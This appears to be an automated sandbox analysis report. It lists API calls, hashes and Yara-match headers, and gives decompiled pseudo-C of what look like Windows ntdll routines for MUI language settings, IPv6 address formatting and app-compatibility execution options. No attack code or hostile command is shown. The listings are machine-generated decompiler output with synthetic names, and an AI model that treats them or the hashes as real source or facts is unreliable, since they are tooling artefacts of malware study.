                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: ae9efab96a5b923ab8d316b95595889d8be8f103b421966385523d891eef0275
                                                      • Instruction ID: 55dcfe6960030c2df01dba447c89608974f31b69251d5a4143be254743b37477
                                                      • Opcode Fuzzy Hash: ae9efab96a5b923ab8d316b95595889d8be8f103b421966385523d891eef0275
                                                      • Instruction Fuzzy Hash: 45E06DB26002046FDB20DF95CC80EE737A99F89250F008255FA4D97342C531E8058BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1C2,0008F1C2,?,00000000,?,?), ref: 0009A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: a92b5ab591dca3b64831b5d8c6ffd47efd980b144ce5bea2ea68f664a5e3be9a
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 25E01AB16002086BDB10DF89CC85EE737ADAF89750F018164BA0C57242C930E8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6EB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                      • Instruction ID: 3a9551da0c4a7b9e66d5b9c056bebd853aa90ba30bee5ab33ec0e55d291aeccc
                                                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                      • Instruction Fuzzy Hash: E9D0A9767903083BEA10FAA89C03F7633CCAB44B04F490074FA88EB3C3E964E8018265
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 94%
                                                      			E00A28788(signed int __ecx, void* __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				short* _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				void* _t216;
                                                      				intOrPtr _t231;
                                                      				short* _t235;
                                                      				intOrPtr _t257;
                                                      				short* _t261;
                                                      				intOrPtr _t284;
                                                      				intOrPtr _t288;
                                                      				void* _t314;
                                                      				signed int _t318;
                                                      				short* _t319;
                                                      				intOrPtr _t321;
                                                      				void* _t328;
                                                      				void* _t329;
                                                      				char* _t332;
                                                      				signed int _t333;
                                                      				signed int* _t334;
                                                      				void* _t335;
                                                      				void* _t338;
                                                      				void* _t339;
                                                      
                                                      				_t328 = __edx;
                                                      				_t322 = __ecx;
                                                      				_t318 = 0;
                                                      				_t334 = _a4;
                                                      				_v8 = 0;
                                                      				_v28 = 0;
                                                      				_v48 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v32 = 0;
                                                      				_v52 = 0;
                                                      				if(_t334 == 0) {
                                                      					_t329 = 0xc000000d;
                                                      					L49:
                                                      					_t334[0x11] = _v56;
                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                      					_t334[0x12] = _v60;
                                                      					_t334[0x13] = _v28;
                                                      					_t334[0x17] = _v20;
                                                      					_t334[0x16] = _v48;
                                                      					_t334[0x18] = _v40;
                                                      					_t334[0x14] = _v32;
                                                      					_t334[0x15] = _v52;
                                                      					return _t329;
                                                      				}
                                                      				_v56 = 0;
                                                      				if(E00A28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						_t207 = E00A0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      					}
                                                      					_push(1);
                                                      					_v8 = _t318;
                                                      					E00A2718A(_t207);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				if(E00A28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_t333 =  *_v8;
                                                      					_v60 = _t333;
                                                      					_t314 = E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					_push(_t333);
                                                      					_v8 = _t318;
                                                      					E00A2718A(_t314);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_t216 = E00A28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                      				_t332 = ";";
                                                      				if(_t216 < 0) {
                                                      					L17:
                                                      					if(E00A28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                      						L30:
                                                      						if(E00A28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                      							L46:
                                                      							_t329 = 0;
                                                      							L47:
                                                      							if(_v8 != _t318) {
                                                      								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      							}
                                                      							if(_v28 != _t318) {
                                                      								if(_v20 != _t318) {
                                                      									E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      									_v20 = _t318;
                                                      									_v40 = _t318;
                                                      								}
                                                      							}
                                                      							goto L49;
                                                      						}
                                                      						_t231 = _v24;
                                                      						_t322 = _t231 + 4;
                                                      						_push(_t231);
                                                      						_v52 = _t322;
                                                      						E00A2718A(_t231);
                                                      						if(_t322 == _t318) {
                                                      							_v32 = _t318;
                                                      						} else {
                                                      							_v32 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      						}
                                                      						if(_v32 == _t318) {
                                                      							_v52 = _t318;
                                                      							L58:
                                                      							_t329 = 0xc0000017;
                                                      							goto L47;
                                                      						} else {
                                                      							E00A02340(_v32, _v8, _v24);
                                                      							_v16 = _v32;
                                                      							_a4 = _t318;
                                                      							_t235 = E00A1E679(_v32, _t332);
                                                      							while(1) {
                                                      								_t319 = _t235;
                                                      								if(_t319 == 0) {
                                                      									break;
                                                      								}
                                                      								 *_t319 = 0;
                                                      								_t321 = _t319 + 2;
                                                      								E00A0E2A8(_t322,  &_v68, _v16);
                                                      								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      								_v16 = _t321;
                                                      								_t235 = E00A1E679(_t321, _t332);
                                                      								_pop(_t322);
                                                      							}
                                                      							_t236 = _v16;
                                                      							if( *_v16 != _t319) {
                                                      								E00A0E2A8(_t322,  &_v68, _t236);
                                                      								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      							}
                                                      							if(_a4 == 0) {
                                                      								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                      								_v52 = _v52 & 0x00000000;
                                                      								_v32 = _v32 & 0x00000000;
                                                      							}
                                                      							if(_v8 != 0) {
                                                      								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      							}
                                                      							_v8 = _v8 & 0x00000000;
                                                      							_t318 = 0;
                                                      							goto L46;
                                                      						}
                                                      					}
                                                      					_t257 = _v24;
                                                      					_t322 = _t257 + 4;
                                                      					_push(_t257);
                                                      					_v40 = _t322;
                                                      					E00A2718A(_t257);
                                                      					_t338 = _t335 + 4;
                                                      					if(_t322 == _t318) {
                                                      						_v20 = _t318;
                                                      					} else {
                                                      						_v20 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      					}
                                                      					if(_v20 == _t318) {
                                                      						_v40 = _t318;
                                                      						goto L58;
                                                      					} else {
                                                      						E00A02340(_v20, _v8, _v24);
                                                      						_v16 = _v20;
                                                      						_a4 = _t318;
                                                      						_t261 = E00A1E679(_v20, _t332);
                                                      						_t335 = _t338 + 0x14;
                                                      						while(1) {
                                                      							_v12 = _t261;
                                                      							if(_t261 == _t318) {
                                                      								break;
                                                      							}
                                                      							_v12 = _v12 + 2;
                                                      							 *_v12 = 0;
                                                      							E00A0E2A8(_v12,  &_v68, _v16);
                                                      							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      							_v16 = _v12;
                                                      							_t261 = E00A1E679(_v12, _t332);
                                                      							_pop(_t322);
                                                      						}
                                                      						_t269 = _v16;
                                                      						if( *_v16 != _t318) {
                                                      							E00A0E2A8(_t322,  &_v68, _t269);
                                                      							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      						}
                                                      						if(_a4 == _t318) {
                                                      							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      							_v40 = _t318;
                                                      							_v20 = _t318;
                                                      						}
                                                      						if(_v8 != _t318) {
                                                      							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      						}
                                                      						_v8 = _t318;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      				_t284 = _v24;
                                                      				_t322 = _t284 + 4;
                                                      				_push(_t284);
                                                      				_v48 = _t322;
                                                      				E00A2718A(_t284);
                                                      				_t339 = _t335 + 4;
                                                      				if(_t322 == _t318) {
                                                      					_v28 = _t318;
                                                      				} else {
                                                      					_v28 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      				}
                                                      				if(_v28 == _t318) {
                                                      					_v48 = _t318;
                                                      					goto L58;
                                                      				} else {
                                                      					E00A02340(_v28, _v8, _v24);
                                                      					_v16 = _v28;
                                                      					_a4 = _t318;
                                                      					_t288 = E00A1E679(_v28, _t332);
                                                      					_t335 = _t339 + 0x14;
                                                      					while(1) {
                                                      						_v12 = _t288;
                                                      						if(_t288 == _t318) {
                                                      							break;
                                                      						}
                                                      						_v12 = _v12 + 2;
                                                      						 *_v12 = 0;
                                                      						E00A0E2A8(_v12,  &_v68, _v16);
                                                      						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      						_v16 = _v12;
                                                      						_t288 = E00A1E679(_v12, _t332);
                                                      						_pop(_t322);
                                                      					}
                                                      					_t296 = _v16;
                                                      					if( *_v16 != _t318) {
                                                      						E00A0E2A8(_t322,  &_v68, _t296);
                                                      						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      					}
                                                      					if(_a4 == _t318) {
                                                      						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                      						_v48 = _t318;
                                                      						_v28 = _t318;
                                                      					}
                                                      					if(_v8 != _t318) {
                                                      						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					}
                                                      					_v8 = _t318;
                                                      					goto L17;
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 00A289FC
                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A28827
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A28914
                                                      • WindowsExcludedProcs, xrefs: 00A287C1
                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A287E6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
                                                      • Instruction ID: 503236c3e890c062753b3303cdb6cdf9fdf712f62648cd8bfc69079971de652b
                                                      • Opcode Fuzzy Hash: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
                                                      • Instruction Fuzzy Hash: 5BF1F7B2D00219EFCF11EF98DA819EEB7B8FF08300F14846AF505A7251EB359A45DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 38%
                                                      			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				char _v24;
                                                      				intOrPtr _t71;
                                                      				signed int _t78;
                                                      				signed int _t86;
                                                      				char _t90;
                                                      				signed int _t91;
                                                      				signed int _t96;
                                                      				intOrPtr _t108;
                                                      				signed int _t114;
                                                      				void* _t115;
                                                      				intOrPtr _t128;
                                                      				intOrPtr* _t129;
                                                      				void* _t130;
                                                      
                                                      				_t129 = _a4;
                                                      				_t128 = _a8;
                                                      				_t116 = 0;
                                                      				_t71 = _t128 + 0x5c;
                                                      				_v8 = 8;
                                                      				_v20 = _t71;
                                                      				if( *_t129 == 0) {
                                                      					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                      						goto L5;
                                                      					} else {
                                                      						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                      						if(_t96 != 0) {
                                                      							L38:
                                                      							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                      								goto L5;
                                                      							} else {
                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                      								_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                      								L36:
                                                      								return _t128 + _t86 * 2;
                                                      							}
                                                      						}
                                                      						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                      						if(_t114 == 0) {
                                                      							L33:
                                                      							_t115 = 0xa02926;
                                                      							L35:
                                                      							_push( *(_t129 + 0xf) & 0x000000ff);
                                                      							_push( *(_t129 + 0xe) & 0x000000ff);
                                                      							_push( *(_t129 + 0xd) & 0x000000ff);
                                                      							_push( *(_t129 + 0xc) & 0x000000ff);
                                                      							_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                      							goto L36;
                                                      						}
                                                      						if(_t114 != 0xffff) {
                                                      							_t116 = 0;
                                                      							goto L38;
                                                      						}
                                                      						if(_t114 != 0) {
                                                      							_t115 = 0xa09cac;
                                                      							goto L35;
                                                      						}
                                                      						goto L33;
                                                      					}
                                                      				} else {
                                                      					L5:
                                                      					_a8 = _t116;
                                                      					_a4 = _t116;
                                                      					_v12 = _t116;
                                                      					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                      						if( *(_t129 + 0xa) == 0xfe5e) {
                                                      							_v8 = 6;
                                                      						}
                                                      					}
                                                      					_t90 = _v8;
                                                      					if(_t90 <= _t116) {
                                                      						L11:
                                                      						if(_a8 - _a4 <= 1) {
                                                      							_a8 = _t116;
                                                      							_a4 = _t116;
                                                      						}
                                                      						_t91 = 0;
                                                      						if(_v8 <= _t116) {
                                                      							L22:
                                                      							if(_v8 < 8) {
                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                      								_t128 = _t128 + E00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                      							}
                                                      							return _t128;
                                                      						} else {
                                                      							L14:
                                                      							L14:
                                                      							if(_a4 > _t91 || _t91 >= _a8) {
                                                      								if(_t91 != _t116 && _t91 != _a8) {
                                                      									_push(":");
                                                      									_push(_t71 - _t128 >> 1);
                                                      									_push(_t128);
                                                      									_t128 = _t128 + E00A37707() * 2;
                                                      									_t71 = _v20;
                                                      									_t130 = _t130 + 0xc;
                                                      								}
                                                      								_t78 = E00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                      								_t130 = _t130 + 0x10;
                                                      							} else {
                                                      								_push(L"::");
                                                      								_push(_t71 - _t128 >> 1);
                                                      								_push(_t128);
                                                      								_t78 = E00A37707();
                                                      								_t130 = _t130 + 0xc;
                                                      								_t91 = _a8 - 1;
                                                      							}
                                                      							_t91 = _t91 + 1;
                                                      							_t128 = _t128 + _t78 * 2;
                                                      							_t71 = _v20;
                                                      							if(_t91 >= _v8) {
                                                      								goto L22;
                                                      							}
                                                      							_t116 = 0;
                                                      							goto L14;
                                                      						}
                                                      					} else {
                                                      						_t108 = 1;
                                                      						_v16 = _t129;
                                                      						_v24 = _t90;
                                                      						do {
                                                      							if( *_v16 == _t116) {
                                                      								if(_t108 - _v12 > _a8 - _a4) {
                                                      									_a4 = _v12;
                                                      									_a8 = _t108;
                                                      								}
                                                      								_t116 = 0;
                                                      							} else {
                                                      								_v12 = _t108;
                                                      							}
                                                      							_v16 = _v16 + 2;
                                                      							_t108 = _t108 + 1;
                                                      							_t26 =  &_v24;
                                                      							 *_t26 = _v24 - 1;
                                                      						} while ( *_t26 != 0);
                                                      						goto L11;
                                                      					}
                                                      				}
                                                      			}





















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                      • Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
                                                      • Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                      • Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00A37EFD(void* __ecx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				char _v540;
                                                      				unsigned int _v544;
                                                      				signed int _v548;
                                                      				intOrPtr _v552;
                                                      				char _v556;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t33;
                                                      				void* _t38;
                                                      				unsigned int _t46;
                                                      				unsigned int _t47;
                                                      				unsigned int _t52;
                                                      				intOrPtr _t56;
                                                      				unsigned int _t62;
                                                      				void* _t69;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				signed int _t73;
                                                      				void* _t74;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				void* _t77;
                                                      
                                                      				_t33 =  *0xae2088; // 0x7663e5d0
                                                      				_v8 = _t33 ^ _t73;
                                                      				_v548 = _v548 & 0x00000000;
                                                      				_t72 = _a4;
                                                      				if(E00A37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                      					__eflags = _v548;
                                                      					if(_v548 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t62 = _t72 + 0x24;
                                                      					E00A53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                      					_t71 = 0x214;
                                                      					_v544 = 0x214;
                                                      					E00A0DFC0( &_v540, 0, 0x214);
                                                      					_t75 = _t74 + 0x20;
                                                      					_t46 =  *0xae4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                      					__eflags = _t46;
                                                      					if(_t46 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t47 = _v544;
                                                      					__eflags = _t47;
                                                      					if(_t47 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					__eflags = _t47 - 0x214;
                                                      					if(_t47 >= 0x214) {
                                                      						goto L1;
                                                      					}
                                                      					_push(_t62);
                                                      					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                      					E00A53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                      					_t52 = E00A10D27( &_v540, L"Execute=1");
                                                      					_t76 = _t75 + 0x1c;
                                                      					_push(_t62);
                                                      					__eflags = _t52;
                                                      					if(_t52 == 0) {
                                                      						E00A53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                      						_t71 =  &_v540;
                                                      						_t56 = _t73 + _v544 - 0x218;
                                                      						_t77 = _t76 + 0x14;
                                                      						_v552 = _t56;
                                                      						__eflags = _t71 - _t56;
                                                      						if(_t71 >= _t56) {
                                                      							goto L1;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      						while(1) {
                                                      							L10:
                                                      							_t62 = E00A18375(_t71, 0x20);
                                                      							_pop(_t69);
                                                      							__eflags = _t62;
                                                      							if(__eflags != 0) {
                                                      								__eflags = 0;
                                                      								 *_t62 = 0;
                                                      							}
                                                      							E00A53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                      							_t77 = _t77 + 0x10;
                                                      							E00A7E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                      							__eflags = _t62;
                                                      							if(_t62 == 0) {
                                                      								goto L1;
                                                      							}
                                                      							_t31 = _t62 + 2; // 0x2
                                                      							_t71 = _t31;
                                                      							__eflags = _t71 - _v552;
                                                      							if(_t71 >= _v552) {
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      					}
                                                      					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                      					_push(3);
                                                      					_push(0x55);
                                                      					E00A53F92();
                                                      					_t38 = 1;
                                                      					L2:
                                                      					return E00A0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                      				}
                                                      				L1:
                                                      				_t38 = 0;
                                                      				goto L2;
                                                      			}




























                                                      APIs
                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A53F12
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A53EC4
                                                      • H'u, xrefs: 00A37F1E
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A53F4A
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A5E345
                                                      • ExecuteOptions, xrefs: 00A53F04
                                                      • Execute=1, xrefs: 00A53F5E
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A5E2FB
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A53F75
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: BaseDataModuleQuery
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$H'u
                                                      • API String ID: 3901378454-1000538930
                                                      • Opcode ID: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
                                                      • Instruction ID: bcf8181ec82f7fa613407dd87d0071683dedaee3ec0dbeed21306069688623c8
                                                      • Opcode Fuzzy Hash: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
                                                      • Instruction Fuzzy Hash: D2418672A8031C7ADF24DA94DCCAFEE73BCBB54701F0045A9B505A61C1EA709B49CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00A40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				void* _t108;
                                                      				void* _t116;
                                                      				char _t120;
                                                      				short _t121;
                                                      				void* _t128;
                                                      				intOrPtr* _t130;
                                                      				char _t132;
                                                      				short _t133;
                                                      				intOrPtr _t141;
                                                      				signed int _t156;
                                                      				signed int _t174;
                                                      				intOrPtr _t177;
                                                      				intOrPtr* _t179;
                                                      				intOrPtr _t180;
                                                      				void* _t183;
                                                      
                                                      				_t179 = _a4;
                                                      				_t141 =  *_t179;
                                                      				_v16 = 0;
                                                      				_v28 = 0;
                                                      				_v8 = 0;
                                                      				_v24 = 0;
                                                      				_v12 = 0;
                                                      				_v32 = 0;
                                                      				_v20 = 0;
                                                      				if(_t141 == 0) {
                                                      					L41:
                                                      					 *_a8 = _t179;
                                                      					_t180 = _v24;
                                                      					if(_t180 != 0) {
                                                      						if(_t180 != 3) {
                                                      							goto L6;
                                                      						}
                                                      						_v8 = _v8 + 1;
                                                      					}
                                                      					_t174 = _v32;
                                                      					if(_t174 == 0) {
                                                      						if(_v8 == 7) {
                                                      							goto L43;
                                                      						}
                                                      						goto L6;
                                                      					}
                                                      					L43:
                                                      					if(_v16 != 1) {
                                                      						if(_v16 != 2) {
                                                      							goto L6;
                                                      						}
                                                      						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                      						L47:
                                                      						if(_t174 != 0) {
                                                      							E00A18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                      							_t116 = 8;
                                                      							E00A0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                      						}
                                                      						return 0;
                                                      					}
                                                      					if(_t180 != 0) {
                                                      						if(_v12 > 3) {
                                                      							goto L6;
                                                      						}
